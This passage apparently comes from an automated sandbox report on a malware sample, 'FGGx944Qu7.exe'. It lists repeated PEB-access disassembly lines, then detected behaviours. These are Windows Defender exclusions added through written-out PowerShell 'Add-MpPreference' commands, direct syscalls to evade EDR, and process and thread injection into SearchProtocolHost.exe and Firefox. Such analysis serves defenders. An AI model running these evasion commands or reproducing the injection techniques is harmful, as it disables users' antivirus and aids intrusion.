Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016789B3 mov esi, dword ptr fs:[00000030h]	8_2_016789B3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016789B3 mov eax, dword ptr fs:[00000030h]	8_2_016789B3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016789B3 mov eax, dword ptr fs:[00000030h]	8_2_016789B3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F09AD mov eax, dword ptr fs:[00000030h]	8_2_015F09AD
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F09AD mov eax, dword ptr fs:[00000030h]	8_2_015F09AD
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4859 mov eax, dword ptr fs:[00000030h]	8_2_015F4859
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4859 mov eax, dword ptr fs:[00000030h]	8_2_015F4859
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E872 mov eax, dword ptr fs:[00000030h]	8_2_0167E872
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E872 mov eax, dword ptr fs:[00000030h]	8_2_0167E872
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686870 mov eax, dword ptr fs:[00000030h]	8_2_01686870
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686870 mov eax, dword ptr fs:[00000030h]	8_2_01686870
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01602840 mov ecx, dword ptr fs:[00000030h]	8_2_01602840
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620854 mov eax, dword ptr fs:[00000030h]	8_2_01620854
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A830 mov eax, dword ptr fs:[00000030h]	8_2_0162A830
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169483A mov eax, dword ptr fs:[00000030h]	8_2_0169483A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169483A mov eax, dword ptr fs:[00000030h]	8_2_0169483A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]	8_2_01612835
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]	8_2_01612835
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]	8_2_01612835
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov ecx, dword ptr fs:[00000030h]	8_2_01612835
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]	8_2_01612835
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]	8_2_01612835
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C810 mov eax, dword ptr fs:[00000030h]	8_2_0167C810
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA8E4 mov eax, dword ptr fs:[00000030h]	8_2_016BA8E4
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C8F9 mov eax, dword ptr fs:[00000030h]	8_2_0162C8F9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C8F9 mov eax, dword ptr fs:[00000030h]	8_2_0162C8F9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E8C0 mov eax, dword ptr fs:[00000030h]	8_2_0161E8C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0887 mov eax, dword ptr fs:[00000030h]	8_2_015F0887
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C89D mov eax, dword ptr fs:[00000030h]	8_2_0167C89D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015ECB7E mov eax, dword ptr fs:[00000030h]	8_2_015ECB7E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4B4B mov eax, dword ptr fs:[00000030h]	8_2_016A4B4B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4B4B mov eax, dword ptr fs:[00000030h]	8_2_016A4B4B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686B40 mov eax, dword ptr fs:[00000030h]	8_2_01686B40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686B40 mov eax, dword ptr fs:[00000030h]	8_2_01686B40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BAB40 mov eax, dword ptr fs:[00000030h]	8_2_016BAB40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01698B42 mov eax, dword ptr fs:[00000030h]	8_2_01698B42
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169EB50 mov eax, dword ptr fs:[00000030h]	8_2_0169EB50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EB20 mov eax, dword ptr fs:[00000030h]	8_2_0161EB20
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EB20 mov eax, dword ptr fs:[00000030h]	8_2_0161EB20
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B8B28 mov eax, dword ptr fs:[00000030h]	8_2_016B8B28
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B8B28 mov eax, dword ptr fs:[00000030h]	8_2_016B8B28
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]	8_2_0166EB1D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0BCD mov eax, dword ptr fs:[00000030h]	8_2_015F0BCD
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0BCD mov eax, dword ptr fs:[00000030h]	8_2_015F0BCD
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0BCD mov eax, dword ptr fs:[00000030h]	8_2_015F0BCD
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167CBF0 mov eax, dword ptr fs:[00000030h]	8_2_0167CBF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EBFC mov eax, dword ptr fs:[00000030h]	8_2_0161EBFC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610BCB mov eax, dword ptr fs:[00000030h]	8_2_01610BCB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610BCB mov eax, dword ptr fs:[00000030h]	8_2_01610BCB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610BCB mov eax, dword ptr fs:[00000030h]	8_2_01610BCB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8BF0 mov eax, dword ptr fs:[00000030h]	8_2_015F8BF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8BF0 mov eax, dword ptr fs:[00000030h]	8_2_015F8BF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8BF0 mov eax, dword ptr fs:[00000030h]	8_2_015F8BF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169EBD0 mov eax, dword ptr fs:[00000030h]	8_2_0169EBD0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4BB0 mov eax, dword ptr fs:[00000030h]	8_2_016A4BB0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4BB0 mov eax, dword ptr fs:[00000030h]	8_2_016A4BB0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600BBE mov eax, dword ptr fs:[00000030h]	8_2_01600BBE
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600BBE mov eax, dword ptr fs:[00000030h]	8_2_01600BBE
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169EA60 mov eax, dword ptr fs:[00000030h]	8_2_0169EA60
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA6F mov eax, dword ptr fs:[00000030h]	8_2_0162CA6F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA6F mov eax, dword ptr fs:[00000030h]	8_2_0162CA6F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA6F mov eax, dword ptr fs:[00000030h]	8_2_0162CA6F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]	8_2_015F6A50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]	8_2_015F6A50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]	8_2_015F6A50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]	8_2_015F6A50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]	8_2_015F6A50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]	8_2_015F6A50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]	8_2_015F6A50
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166CA72 mov eax, dword ptr fs:[00000030h]	8_2_0166CA72
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166CA72 mov eax, dword ptr fs:[00000030h]	8_2_0166CA72
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600A5B mov eax, dword ptr fs:[00000030h]	8_2_01600A5B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600A5B mov eax, dword ptr fs:[00000030h]	8_2_01600A5B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA24 mov eax, dword ptr fs:[00000030h]	8_2_0162CA24
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EA2E mov eax, dword ptr fs:[00000030h]	8_2_0161EA2E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01614A35 mov eax, dword ptr fs:[00000030h]	8_2_01614A35
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01614A35 mov eax, dword ptr fs:[00000030h]	8_2_01614A35
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167CA11 mov eax, dword ptr fs:[00000030h]	8_2_0167CA11
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162AAEE mov eax, dword ptr fs:[00000030h]	8_2_0162AAEE
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162AAEE mov eax, dword ptr fs:[00000030h]	8_2_0162AAEE
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0AD0 mov eax, dword ptr fs:[00000030h]	8_2_015F0AD0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646ACC mov eax, dword ptr fs:[00000030h]	8_2_01646ACC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646ACC mov eax, dword ptr fs:[00000030h]	8_2_01646ACC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646ACC mov eax, dword ptr fs:[00000030h]	8_2_01646ACC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624AD0 mov eax, dword ptr fs:[00000030h]	8_2_01624AD0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624AD0 mov eax, dword ptr fs:[00000030h]	8_2_01624AD0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646AA4 mov eax, dword ptr fs:[00000030h]	8_2_01646AA4
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4A80 mov eax, dword ptr fs:[00000030h]	8_2_016C4A80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628A90 mov edx, dword ptr fs:[00000030h]	8_2_01628A90
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8AA0 mov eax, dword ptr fs:[00000030h]	8_2_015F8AA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8AA0 mov eax, dword ptr fs:[00000030h]	8_2_015F8AA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01688D6B mov eax, dword ptr fs:[00000030h]	8_2_01688D6B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0D59 mov eax, dword ptr fs:[00000030h]	8_2_015F0D59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0D59 mov eax, dword ptr fs:[00000030h]	8_2_015F0D59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0D59 mov eax, dword ptr fs:[00000030h]	8_2_015F0D59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]	8_2_015F8D59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]	8_2_015F8D59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]	8_2_015F8D59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]	8_2_015F8D59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]	8_2_015F8D59

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtUnmapViewOfSection: Direct from: 0x76F02D3C	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Memory written: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: NULL target: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Thread register set: target process: 7468

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Thread APC queued: target process: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"	Jump to behavior
